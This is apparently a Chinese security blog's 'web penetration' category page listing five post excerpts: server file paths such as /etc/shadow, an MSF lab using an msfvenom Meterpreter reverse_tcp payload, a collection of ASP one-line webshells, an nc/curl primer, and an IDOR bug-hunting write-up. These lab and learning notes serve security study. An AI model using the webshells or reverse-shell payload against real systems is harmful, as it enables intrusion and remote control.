分类: WEB渗透

9 篇文章

【原创】常用服务器绝对路径
[huayang] /etc/passwd 是linux系统保存用户信息及其工作目录的文件 /etc/shadow 是linux系统保存用户信息及(可能存在)密码(hash)的文件 /etc/apache2 是apache的配置文件,可以看见web的目录和服务端口等信息,常用于确认路径 /etc/nginx nginx配置文件,,可以看见web的目…
MSF简单提权开启远程桌面并连接
[huayang] 攻击机: kali:172.16.181.8 win sever2012 :172.16.181.4 目标机: win7:172.16.181.9 建立连接 msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.181.8 LPORT=4444 -f exe -o 12…
【转载】各种小马小结
原文地址:https://blog.csdn.net/qq_35078631/article/details/77743794 最近总是碰到小马的题目,心想还是小小收集一下各种的小马,碰到新的再更新ASP <%eval request("sb")%> <%execute request("sb")%> <%execut…
thumbnail
【原创】浅谈nc与curl
[huayang] NC nc被誉为网络安全界的瑞士军刀,一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据 实验环境 操作系统IP地址kali 2021172.16.231.128macOS 172.16.231.1 简单的交互 -l:使用监听模式,监控传入的信息 macOS开启监听 kali链接2333 输入的任何信息都会被对…
thumbnail
【原创】记一次漏洞挖掘
漏洞已修复我就不打码了! 来到网站首页没有发现可利用的点 注册个账号进去康康 点击账户账户总览即可以看见私密信息 抓包 这图是我聊天记录把下来的,以前的方式还记得,只是暂且记录一下 通过图片可以看见是平行越权,通过改id即可访问别人的信息 好家伙,写个脚本跑跑